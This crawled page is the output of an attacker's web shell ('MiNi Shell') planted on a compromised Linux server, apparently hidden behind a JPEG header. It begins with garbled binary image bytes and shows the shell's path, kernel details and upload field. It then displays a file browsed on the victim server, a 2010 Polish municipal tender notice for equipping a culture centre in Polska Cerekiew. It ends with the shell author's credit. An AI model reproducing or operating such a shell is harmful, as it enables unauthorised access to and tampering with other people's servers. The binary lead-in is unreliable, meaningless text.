JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101116/369468-N-2010.html

<p class="kh_header"><b>Polska Cerekiew: Wyposażenie budynku z przeznaczeniem na Centrum Kultury w Polskiej Cerekwi</b><br>
<b>Numer ogłoszenia: 369468 - 2010; data zamieszczenia: 16.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Polskiej Cerekwi , ul. Raciborska 4, 47-260 Polska Cerekiew, woj. opolskie, tel. 077 4801460, faks 077 4801460.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.polskacerekiew.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wyposażenie budynku z przeznaczeniem na Centrum Kultury w Polskiej Cerekwi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres rzeczowy obejmuje:
A.	Wyposażenie kawiarenki internetowej	 	 
A.1.	Stolik komputerowy 75 x 92 x 60	szt.	10
A.2.	Biurko 75 x 140 x 70	szt.	1
A.3.	Krzesło biurowe	szt.	11
A.4.	Szafa biurowa 183 x 60 x 38	szt.	1
A.5.	Komputer stacjonarny	szt.	10
A.6.	Serwer	szt.	1
A.7.	Monitor 17cali	szt.	11
A.8.	Laserowe urządzenie wielofunkcyjne kolorowe	szt.	1
A.9.	Drukarka atramentowa	szt.	1
A.10.	Kaseta do urządzenia wielofuncyjnego z kolorowym tonerem (różne kolory)	szt.	20
A.11.	Wkład atramentowy do drukarki atramentowej	szt.	10
A.12.	Szafa rack wisząca 19cali	szt.	1
A.13.	Router WiFi 	szt.	1
A.14.	Przełącznik 16-portowy	szt.	1
A.15.	Patch panel 16-porotwy 19cali	szt.	1
A.16.	System operacyjny Windows Server 2008	szt.	1
A.17.	Pakiet biurowy Microsoft Office 2007 PL	szt.	11
A.18.	Program antywirusowy	szt.	11
A.19.	Gniazdo RJ-45 UTP kat. 5e	szt.	20
A.20.	Kabel sieciowy UTP kat. 5e	rolka	1
A.21.	Listwa zasilająca 19cali do szafy rack	szt.	1
A.22.	Zasilacz awaryjny	szt.	1
A.23.	Wtyk zaciskany RJ-45	szt.	50
A.24.	Osłona na wtyk RJ-45	szt.	50
A.25.	Narzędzie do zaciskania końcówek RJ-11/12/45	szt.	1
A.26.	Tablica suchościeralna magnetyczna 150 x 100	szt.	1
B.	Wyposażenie sali konferencyjnej	 	 
B.1.	Stół konferencyjny 250 x 100	szt.	16
B.2.	Krzesło 79 x 53 x 42	szt.	110
B.3.	Stół biurowy prosty 76 x 140 x 70	szt.	1
B.4.	Fotel biurowy 122 x 48 x 50	szt.	1
B.5.	Szafa biurowa 183 x 60 x 38	szt.	1
B.6.	Szafa niska 79 x 80 x 38	szt.	1
B.7.	Notebook + torba	szt.	1
B.8.	Projektor	szt.	1
B.9.	Bezprzewodowy pilot do prezentacji	szt.	1
B.10.	Access Point	szt.	1
B.11.	Elektryczny ekran do projektora 240 x 180	szt.	1
B.12.	Uchwyt sufitowy do projektora	szt.	1
B.13.	Flipchart magnetyczny 100 x 67.5	szt.	1
B.14.	Tablica suchościeralna magnetyczna 150 x 100	szt.	1
B.15.	Blok papierowy do flipchartów	szt.	30
B.16.	Gąbka magnetyczna do tablic suchościeralnych i flipchartów	szt.	30
B.17.	Wkład do gąbki magnetycznej	kpl	10
B.18.	Markery suchościeralne	kpl.	10
B.19.	Płyn do czyszczenia tablic suchościeralnych	szt.	20
C.	Wyposażenie sali szkoleniowej	 	 
C.1.	Stół konferencyjny 150 x 100	szt.	35
C.2.	Krzesło 79 x 53 x 42	szt.	80
C.3.	Stół biurowy 76 x 140 x 70	szt.	1
C.4.	Fotel biurowy 122 x 48 x 50	szt.	1
C.5.	Szafa biurowa 183 x 60 x 38	szt.	1
C.6.	Szafka niska 79 x 80 x 38	szt.	1
C.7.	Projektor	szt.	1
C.8.	Bezprzewodowy pilot do prezentacji	szt.	1
C.9.	Access Point	szt.	1
C.10.	Telewizor LCD 52cali	szt.	1
C.11.	Elektryczny ekran do projektora 240 x 180	szt.	1
C.12.	Uchwyt sufitowy do projektora	szt.	1
C.13.	Uchwyt ścienny do telewizora LCD 52cali	szt.	1
C.14.	Flipchart magnetyczny 100 x 67.5	szt.	1
C.15.	Tablica suchościeralna magnetyczna 150 x 100	szt.	1
C.16.	Blok papierowy do flipchartów	szt.	30
C.17.	Gąbka magnetyczna do tablic suchościeralnych i flipchartów	szt.	30
C.18.	Wkład do gąbki magnetycznej	kpl	10
C.19.	Markery suchościeralne	kpl.	10
C.20.	Płyn do czyszczenia tablic suchościeralnych	szt.	20
D.	Wyposażenie kuchni	 	 
D.1.	Kuchnia do zabudowy	szt.	1
D.2.	Stół kuchenny 75 x 90 x 200	szt.	2
D.3.	Krzesło kuchenne 97 x 46 x 45	szt.	20
D.4.	Zmywarka	szt.	1
D.5.	Chłodziarko - zamrażarka	szt.	1
D.6.	Kuchnia elektryczna	szt.	1
D.7.	Okap kuchenny	szt.	1
D.8.	Kuchenka mikrofalowa	szt.	1
D.9.	Czajnik bezprzewodowy	szt.	3
D.10.	Ekspres do kawy	szt.	1
D.11.	Krajalnica do chleba	szt.	1
D.12.	Mikser z misą	szt.	1
D.13.	Robot kuchenny	szt.	1
D.14.	Maszynka do mielenia mięsa	szt.	1
D.15.	Garnek metalowy 2 l	szt.	3
D.16.	Garnek metalowy 3 l	szt.	3
D.17.	Garnek metalowy 6.5 l	szt.	3
D.18.	Patelnia 24 cm	szt.	1
D.19.	Patelnia 28 cm	szt.	1
D.20.	Patelnia 32 cm	szt.	1
D.21.	Serwis kawowy dla 12 osób	kpl.	10
D.22.	Serwis obiadowy dla 12 osób	kpl.	10
D.23.	Zestaw sztućców dla 12 osób	kpl.	10
D.24.	Szklanki do soku 6 szt.	kpl.	20
D.25.	Ściereczki kuchenne 50 x 70	szt.	10
E.	Wyposażenie pokoi	 	 
E.1.	Łóżko pokojowe 202 x 86	szt.	9
E.2.	Szafa pokojowa 202 x 100 x 61	szt.	6
E.3.	Stół pokojowy 130 x 70	szt.	6
E.4.	Krzesło pokojowe 92 x 45 x 43	szt.	9
E.5.	Szafka nocna 41 x 42 x 35	szt.	9
E.6.	Lampa pokojowa sufitowa	szt.	6
E.7.	Lampa stojąca	szt.	6
E.8.	Wieszak na ubranie 120 x 100 x 20	szt.	6
E.9.	Prześcieradło	szt.	10
E.10.	Komplet pościeli	kpl.	10
E.11.	Koc	szt.	10
E.12.	Kołdra poliestrowa	szt.	10
E.13.	Poduszka polierstrowa	szt.	10
F.	Wyposażenie pomieszczenia gospodarczego	 	 
F.1.	Pralko-suszarka	szt.	1
F.2.	Szafa odzieżowa 182 x 60 x 52	szt.	1
F.3.	Stół 200 x 100	szt.	1
F.4.	Deska do prasowania	szt.	1
F.5.	Żelazko	szt.	1
F.6.	Odkurzacz bezworkowy	szt.	1
F.7.	Zestaw serwisowy	kpl.	1
F.8.	Zestaw do mycia podłóg	szt.	3
F.9.	Szczotka	szt.	3
F.10.	Śmietniczka ze sczotką	szt.	3
F.11.	Kosz 20 l	szt.	5
F.12.	Kosz z popielniczką	szt.	1
F.13.	Tablica ostrzegawcza (Mokra podłoga)	szt.	1
G.	Wyposażenie szatni	 	 
G.1.	Wieszak szatniowy	szt.	4
G.2.	250 x 500 x 60	szt.	1
G.3.	Lada recepcyjna 110 x 220 x 70	szt.	1
H.	Wyposażenie toalet w pokojach	 	 
H.1.	Wieszak 4 hakowy	szt.	6
H.2.	Półka pod lustro	szt.	6
H.3.	Uchwyt WC	szt.	6
H.4.	Szklanka z podstawką	szt.	6
H.5.	Dozownik na mydło	szt.	6
H.6.	Szczotka WC	szt.	6
H.7.	Kosz 10 l	szt.	6
H.8.	Lustro kryształowe	szt.	6
H.9.	Lampa sufitowa	szt.	6
H.10.	Lampka nad lustro	szt.	6
H.11.	Ręczniki	kpl.	20
I.	Wyposażenie toalet na parterze	 	 
I.1.	Suszarka automatyczna aluminiowa	szt.	3
I.2.	Dozownik ręczników składanych	szt.	3
I.3.	Dozownik mydła w płynie	szt.	6
I.4.	Kosz 20 l	szt.	3
I.5.	Dozownik papieru toaletowego	szt.	6
I.6.	Lustro kryształowe	szt.	6
I.7.	Elektroniczny odświeżacz powietrza	szt.	6
I.8.	Wkład do elektronicznego odświeżacza powietrza	szt.	30
J.	Wyposażenie toalety na piętrze	 	 
J.1.	Suszarka automatyczna aluminiowa	szt.	1
J.2.	Dozownik ręczników składanych	szt.	1
J.3.	Dozownik mydła w płynie	szt.	2
J.4.	Kosz 20 l	szt.	1
J.5.	Dozownik papieru toaletowego	szt.	2
J.6.	Lustro kryształowe	szt.	2
J.7.	Elektroniczny odświeżacz powietrza	szt.	2
K.	Wyposażenie toalety dla niepełnosprawnych	 	 
K.1.	Suszarka automatyczna aluminiowa	szt.	1
K.2.	Dozownik ręczników składanych	szt.	1
K.3.	Dozownik mydła w płynie	szt.	1
K.4.	Kosz 20 l	szt.	1
K.5.	Dozownik papieru toaletowego	szt.	1
K.6.	Lustro kryształowe	szt.	1
K.7.	Elektroniczny odświeżacz powietrza	szt.	1.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.13.00.00-2, 39.13.40.00-0, 39.14.10.00-2, 39.15.00.00-8, 39.15.30.00-9, 39.15.13.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Na podstawie art. 45 ust. 2 Zamawiający żąda, a Oferent zobowiązany jest do wniesienia wadium w wysokości 5 000 zł, do dnia 24 listopada 2010r. (środa) do godz. 11.00.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy oraz spełniają warunki określone w art. 22 ust. 1 pkt 1-3 ustawy;
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału 
w postępowaniu na podstawie załączonych dokumentów oświadczeń, zgodnie z formułą (spełnia-nie spełnia). Z treści załączonych do oferty dokumentów musi jednoznacznie wynikać, że w/w warunki Wykonawca spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony formularz oferty na Druku nr 1, 
2.	Wypełniona specyfikacja wyposażenia Druk nr 6,
3.	Wypełniony i zaparafowany projekt umowy,  
4.	Dowód wniesienia wadium na warunkach określonych w rozdziale 8 SIWZ,
5.	Próbki z metryką określającą nazwę producenta i typ:
- płyta meblowa  o wym. 300 x 300 mm.,
- obicie krzeseł/foteli - tkanina  o wym. 100 x 100 mm.,
- front kuchenny z uchwytem- 1 szt.
- blat kuchenny - 200 x 200 mm.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.polskacerekiew.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Polskiej Cerekwi, ul. Raciborska 4, 47-260 Polska Cerekiew, pokój 11 (I piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.11.2010 godzina 11:00, miejsce: Urząd Gminy w Polskiej Cerekwi, ul. Raciborska 4, 47-260 Polska Cerekiew, pokój 16 Sekretariat (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt częściowo finansowany przez Unię Europejską w ramach Programu Rozwoju Obszarów Wiejskich na lata 2007- 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com